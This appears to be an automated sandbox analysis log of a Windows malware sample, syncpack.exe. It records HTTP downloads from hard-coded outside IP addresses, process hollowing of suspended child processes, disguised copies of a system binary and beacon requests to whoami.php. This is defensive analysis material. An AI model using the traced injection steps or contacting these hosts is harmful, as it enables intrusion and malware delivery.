System Get Time type = Ticks, time = 250974 True 28
Fn
System Get Time type = Ticks, time = 250974 True 1
Fn
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 216.46.44.93, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
System Get Time type = Ticks, time = 251208 True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 216.46.44.93 True 1
Fn
Data
System Get Time type = Ticks, time = 251473 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Inet Read Response size = 280388, size_out = 280388 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Ticks, time = 258322 True 61
Fn
System Get Time type = Ticks, time = 258337 True 17
Fn
System Get Time type = Ticks, time = 260662 True 1
Fn
File Write size = 335922 True 1
Fn
Data
System Get Time type = Ticks, time = 260849 True 5
Fn
System Get Time type = Ticks, time = 260864 True 13
Fn
System Get Time type = Ticks, time = 260880 True 15
Fn
System Get Time type = Ticks, time = 260896 True 14
Fn
System Get Time type = Ticks, time = 260911 True 6
Fn
System Get Time type = Ticks, time = 260927 True 50
Fn
System Get Time type = Ticks, time = 260942 True 35
Fn
System Get Time type = Ticks, time = 260958 True 2
Fn
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
System Get Time type = Ticks, time = 260958 True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 216.46.44.93, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
System Get Time type = Ticks, time = 260958 True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 216.46.44.93 True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Inet Read Response size = 148, size_out = 148 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Ticks, time = 261379 True 80
Fn
Thread 0x878
29 4
Category Operation Information Success Count Logfile
System Get Time type = Ticks, time = 250787 True 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x77740000 True 1
Fn
Module Load module_name = crypt32.dll, base_address = 0x76260000 True 1
Fn
Module Load module_name = shell32.dll, base_address = 0x76480000 True 1
Fn
Module Load module_name = urlmon.dll, base_address = 0x75870000 True 1
Fn
Module Load module_name = userenv.dll, base_address = 0x75290000 True 1
Fn
Module Load module_name = wininet.dll, base_address = 0x772c0000 True 1
Fn
Module Load module_name = wtsapi32.dll, base_address = 0x75420000 True 1
Fn
File Create Temp File filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, path = C:\Users\kFT6uTQW\AppData\Local\Temp\ True 1
Fn
File Delete filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp True 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1
Fn
Process Create process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp", os_pid = 0x4f4, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE True 1
Fn
Memory Get Info "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp", address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 True 1
Fn
Memory Protect process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp", address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 114688 False 1
Fn
Module Unmap process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp" True 1
Fn
Memory Allocate process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp", address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688 True 1
Fn
Thread Get Context process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, os_tid = 0x878 True 1
Fn
Memory Write process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp", address = 0x400000, size = 114688 True 1
Fn
Data
Memory Write process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp", address = 0x7efde008, size = 4 True 1
Fn
Data
Memory Write process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp", address = 0x7efdf010, size = 4 True 1
Fn
Data
Thread Set Context process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, os_tid = 0x878 True 1
Fn
Thread Resume process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, os_tid = 0x878 True 1
Fn
Process Terminate exit_code = 0 False 1
Fn
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe True 1
Fn
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 94.70.244.227, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 94.70.244.227 False 1
Fn
Thread 0x86c
35 0
Category Operation Information Success Count Logfile
Module Load module_name = advapi32.dll, base_address = 0x77740000 True 1
Fn
Module Load module_name = crypt32.dll, base_address = 0x76260000 True 1
Fn
Module Load module_name = shell32.dll, base_address = 0x76480000 True 1
Fn
Module Load module_name = urlmon.dll, base_address = 0x75870000 True 1
Fn
Module Load module_name = userenv.dll, base_address = 0x75290000 True 1
Fn
Module Load module_name = wininet.dll, base_address = 0x772c0000 True 1
Fn
Module Load module_name = wtsapi32.dll, base_address = 0x75420000 True 1
Fn
File Create Temp File filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp, path = C:\Users\kFT6uTQW\AppData\Local\Temp\ True 1
Fn
File Delete filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp True 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1
Fn
Process Create process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp", os_pid = 0x8a0, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE True 1
Fn
Memory Get Info "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp", address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 True 1
Fn
Memory Protect process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp", address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 102400 True 1
Fn
Thread Get Context process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, os_tid = 0x86c True 1
Fn
Memory Write process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp", address = 0x400000, size = 102400 True 1
Fn
Data
Memory Write process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp", address = 0x7efde008, size = 4 True 1
Fn
Data
Memory Write process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp", address = 0x7efdf010, size = 4 True 1
Fn
Data
Thread Set Context process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, os_tid = 0x86c True 1
Fn
Thread Resume process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, os_tid = 0x86c True 1
Fn
Process Terminate exit_code = 0 False 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1
Fn
File Copy source_filename = C:\Windows\system32\alg.exe, destination_filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe True 1
Fn
Process Create process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp", os_pid = 0x834, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE True 1
Fn
Memory Get Info "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp", address = 0x40000000, protection_out = PAGE_READWRITE, PAGE_EXECUTE_READWRITE, size_out = 0 True 1
Fn
Memory Allocate process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp", address = 0x2d7f898, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 47708320 True 1
Fn
Thread Get Context process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, os_tid = 0x86c True 1
Fn
Memory Write process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp", address = 0x140000000, size = 126976 True 1
Fn
Data
Memory Write process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp", address = 0x7fffffd8010, size = 8 True 1
Fn
Data
Thread Set Context process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, os_tid = 0x86c True 1
Fn
Thread Resume process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, os_tid = 0x86c True 1
Fn
Process Terminate exit_code = 0 False 1
Fn
File Delete filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe True 1
Fn
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp, type = size True 1
Fn
File Delete filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp True 1
Fn
Thread 0x868
25 0
Category Operation Information Success Count Logfile
Module Load module_name = advapi32.dll, base_address = 0x77740000 True 1
Fn
Module Load module_name = crypt32.dll, base_address = 0x76260000 True 1
Fn
Module Load module_name = shell32.dll, base_address = 0x76480000 True 1
Fn
Module Load module_name = urlmon.dll, base_address = 0x75870000 True 1
Fn
Module Load module_name = userenv.dll, base_address = 0x75290000 True 1
Fn
Module Load module_name = wininet.dll, base_address = 0x772c0000 True 1
Fn
Module Load module_name = wtsapi32.dll, base_address = 0x75420000 True 1
Fn
File Create Temp File filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp, path = C:\Users\kFT6uTQW\AppData\Local\Temp\ True 1
Fn
File Delete filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp True 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1
Fn
Process Create process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp", os_pid = 0x728, creation_flags = CREATE_SUSPENDED, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE True 1
Fn
Memory Get Info "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp", address = 0x400000, allocation_type = MEM_RESET_UNDO, protection_out = PAGE_READONLY, size_out = 4096 True 1
Fn
Memory Protect process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp", address = 0x400000, protection = PAGE_EXECUTE_READWRITE, size = 372736 False 1
Fn
Module Unmap process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp" True 1
Fn
Memory Allocate process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp", address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 372736 True 1
Fn
Thread Get Context process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, os_tid = 0x868 True 1
Fn
Memory Write process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp", address = 0x400000, size = 372736 True 1
Fn
Data
Memory Write process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp", address = 0x7efde008, size = 4 True 1
Fn
Data
Memory Write process_name = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp", address = 0x7efdf010, size = 4 True 1
Fn
Data
Thread Set Context process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, os_tid = 0x868 True 1
Fn
Thread Resume process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, os_tid = 0x868 True 1
Fn
Process Terminate exit_code = 0 False 1
Fn
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp, type = size True 1
Fn
File Delete filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp True 1
Fn
Thread 0x864
48 7
Category Operation Information Success Count Logfile
System Get Time type = Ticks, time = 250834 True 1
Fn
System Get Time type = System Time, time = 2018-06-25 14:54:22 (UTC) True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75fc4f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x75fc359f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75fc1252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75fc4208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x75fc4d28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x7604410b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x76044195 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x75fcd31f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x75fdee7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x77c2441c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x77c4c50e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x77c4c381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x75fdf088 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x77c305d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x77c4ca24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77c00b8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x77cbfde8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77c51e1d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x76044761 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x7603cd11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x7604424f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x760446b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x76056676 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x76044751 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x760565f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x760447c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x760447e1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x760447f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x75fdeee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1
Fn
Mutex Create mutex_name = Global\Nx357ECDE7 True 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x77740000 True 1
Fn
Module Load module_name = crypt32.dll, base_address = 0x76260000 True 1
Fn
Module Load module_name = shell32.dll, base_address = 0x76480000 True 1
Fn
Module Load module_name = urlmon.dll, base_address = 0x75870000 True 1
Fn
Module Load module_name = wininet.dll, base_address = 0x772c0000 True 1
Fn
Module Load module_name = ws2_32.dll, base_address = 0x75af0000 True 1
Fn
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = http, server_name = 94.70.244.227, server_port = 80 False 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /whoami.php, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD False 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://94.70.244.227:80/whoami.php False 1
Fn
Inet Open Connection protocol = http, server_name = 190.213.248.219, server_port = 80 False 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /whoami.php, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD False 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS False 1
Fn
Thread 0x860
10 0
Category Operation Information Success Count Logfile
System Get Time type = Ticks, time = 250865 True 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x77740000 True 1
Fn
Module Load module_name = crypt32.dll, base_address = 0x76260000 True 1
Fn
Module Load module_name = mpr.dll, base_address = 0x750f0000 True 1
Fn
Module Load module_name = netapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Load module_name = SAMCLI.DLL, base_address = 0x74de0000 True 1
Fn
Module Load module_name = shell32.dll, base_address = 0x76480000 True 1
Fn
Module Load module_name = wtsapi32.dll, base_address = 0x75420000 True 1
Fn
System Get Computer Name result_out = XABNCPUWKW True 1
Fn
Process #8: syncpack.exe
182 0
Information Value
ID #8
File Name c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:18, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:50
OS Process Information
Information Value
PID 0x4f4
Parent PID 0xb70 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x480
0x12C
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000001e0000 0x001e0000 0x001effff Private Memory Readable, Writable True False False -
private_0x00000000001f0000 0x001f0000 0x0026ffff Private Memory Readable, Writable True False False -
private_0x0000000000270000 0x00270000 0x002affff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x003bffff Private Memory Readable, Writable True False False -
private_0x0000000000400000 0x00400000 0x0041bfff Private Memory Readable, Writable, Executable True False False -
locale.nls 0x00420000 0x00486fff Memory Mapped File Readable False False False -
private_0x0000000000510000 0x00510000 0x0051ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000520000 0x00520000 0x006a7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000006b0000 0x006b0000 0x00830fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000840000 0x00840000 0x01c3ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001c40000 0x01c40000 0x01d3ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x01d40000 0x0200efff Memory Mapped File Readable False False False -
private_0x0000000002010000 0x02010000 0x0210ffff Private Memory Readable, Writable True False False -
atl.dll 0x6fe40000 0x6fe53fff Memory Mapped File Readable, Writable, Executable False False False -
pstorec.dll 0x6fe60000 0x6fe6cfff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x75020000 0x750a3fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
